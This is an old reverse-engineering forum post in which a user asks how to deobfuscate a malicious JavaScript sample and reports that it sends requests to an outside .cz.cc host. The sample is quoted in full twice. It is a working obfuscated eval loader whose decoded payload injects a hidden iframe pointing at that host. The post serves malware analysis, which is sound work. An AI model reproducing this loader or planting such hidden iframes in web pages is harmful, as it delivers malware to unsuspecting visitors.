Exetools - View Single Post - Deobfuscate Javascript, script can't be compiled

bolzano_1989 · #1 12-30-2011, 01:49

I try to deobfuscate the following malicious Javascript with Malzilla:

Code:

 Object.prototype.qwe=function()
 {
   return String["fro"+'mCha'+'rCo'+'de'];
 };
 Object.prototype.asd="e";
 var s="";
 try
 {
   {
   }
   ['qwtqwt']();
 }
 catch(q)
 {
   r=1;
 }
 if(r&&+new Object(1231)&&document.createTextNode('123').data&&typeof
 {
 }
 .asd.vfr==='undefined')w=2;
 e=eval;
 m=[18/w,18/w,210/w,204/w,64/w,80/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,82/w,246/w,18/w,18/w,18/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,118/w,18/w,18/w,250/w,64/w,202/w,216/w,230/w,202/w,64/w,246/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,238/w,228/w,210/w,232/w,202/w,80/w,68/w,120/w,210/w,204/w,228/w,194/w,218/w,202/w,64/w,230/w,228/w,198/w,122/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,210/w,94/w,204/w,232/w,224/w,98/w,78/w,64/w,238/w,210/w,200/w,232/w,208/w,122/w,78/w,98/w,96/w,78/w,64/w,208/w,202/w,210/w,206/w,208/w,232/w,122/w,78/w,98/w,96/w,78/w,64/w,230/w,232/w,242/w,216/w,202/w,122/w,78/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,116/w,208/w,210/w,200/w,200/w,202/w,220/w,118/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,116/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,118/w,216/w,202/w,204/w,232/w,116/w,96/w,118/w,232/w,222/w,224/w,116/w,96/w,118/w,78/w,124/w,120/w,94/w,210/w,204/w,228/w,194/w,218/w,202/w,124/w,68/w,82/w,118/w,18/w,18/w,250/w,18/w,18/w,204/w,234/w,220/w,198/w,232/w,210/w,222/w,220/w,64/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,246/w,18/w,18/w,18/w,236/w,194/w,228/w,64/w,204/w,64/w,122/w,64/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,198/w,228/w,202/w,194/w,232/w,202/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,80/w,78/w,210/w,204/w,228/w,194/w,218/w,202/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,230/w,228/w,198/w,78/w,88/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,210/w,94/w,204/w,232/w,224/w,98/w,78/w,82/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,122/w,78/w,208/w,210/w,200/w,200/w,202/w,220/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,122/w,78/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,216/w,202/w,204/w,232/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,232/w,222/w,224/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,238/w,210/w,200/w,232/w,208/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,208/w,202/w,210/w,206/w,208/w,232/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,92/w,194/w,224/w,224/w,202/w,220/w,200/w,134/w,208/w,210/w,216/w,200/w,80/w,204/w,82/w,118/w,18/w,18/w,250/w];
 mm=
 {
 }
 .qwe();
 for(i=0;i<m.length;i++)if(
 {
 }
 .asd==='e')s+=mm(e("m"+"["+"i]"));
 e(s);

and Malzilla returns the message "Script can't be compiled".
I have tried to debug and got the error message "object is not a function":

Code:

   ['qwtqwt']();

. After some modifications, it was able to be compiled.

Code:

 Object.prototype.qwe=function()
 {
   return String["fro"+'mCha'+'rCo'+'de'];
 };
 Object.prototype.asd="e";
 var s="";
 r=0
 try
 {
   {
   }
   ['qwtqwt'];
 }
 catch(q)
 {
   r=1;
 }
 w = 2
 if(r&&+new Object(1231)&&document.createTextNode('123').data&&typeof
 {
 }
 .asd.vfr==='undefined')w=2;
 e=eval;
 m=[18/w,18/w,210/w,204/w,64/w,80/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,82/w,246/w,18/w,18/w,18/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,118/w,18/w,18/w,250/w,64/w,202/w,216/w,230/w,202/w,64/w,246/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,238/w,228/w,210/w,232/w,202/w,80/w,68/w,120/w,210/w,204/w,228/w,194/w,218/w,202/w,64/w,230/w,228/w,198/w,122/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,210/w,94/w,204/w,232/w,224/w,98/w,78/w,64/w,238/w,210/w,200/w,232/w,208/w,122/w,78/w,98/w,96/w,78/w,64/w,208/w,202/w,210/w,206/w,208/w,232/w,122/w,78/w,98/w,96/w,78/w,64/w,230/w,232/w,242/w,216/w,202/w,122/w,78/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,116/w,208/w,210/w,200/w,200/w,202/w,220/w,118/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,116/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,118/w,216/w,202/w,204/w,232/w,116/w,96/w,118/w,232/w,222/w,224/w,116/w,96/w,118/w,78/w,124/w,120/w,94/w,210/w,204/w,228/w,194/w,218/w,202/w,124/w,68/w,82/w,118/w,18/w,18/w,250/w,18/w,18/w,204/w,234/w,220/w,198/w,232/w,210/w,222/w,220/w,64/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,246/w,18/w,18/w,18/w,236/w,194/w,228/w,64/w,204/w,64/w,122/w,64/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,198/w,228/w,202/w,194/w,232/w,202/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,80/w,78/w,210/w,204/w,228/w,194/w,218/w,202/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,230/w,228/w,198/w,78/w,88/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,210/w,94/w,204/w,232/w,224/w,98/w,78/w,82/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,122/w,78/w,208/w,210/w,200/w,200/w,202/w,220/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,122/w,78/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,216/w,202/w,204/w,232/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,232/w,222/w,224/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,238/w,210/w,200/w,232/w,208/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,208/w,202/w,210/w,206/w,208/w,232/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,92/w,194/w,224/w,224/w,202/w,220/w,200/w,134/w,208/w,210/w,216/w,200/w,80/w,204/w,82/w,118/w,18/w,18/w,250/w];
 mm=
 {
 }
 .qwe();
 for(i=0;i<m.length;i++)if(
 {
 }
 .asd==='e')s+=mm(e("m"+"["+"i]"));
 e(s);

With the help of Firebug, I am able to see that this Javascript results some GET requests to

Code:

http://kopole4ilo9.cz.cc/i/ftp1

.
Can you give me some tips to continue my Javascript deobfuscation or some better way to deobfuscate this Javascript?
I have tried to replace eval with alert but it was not successful.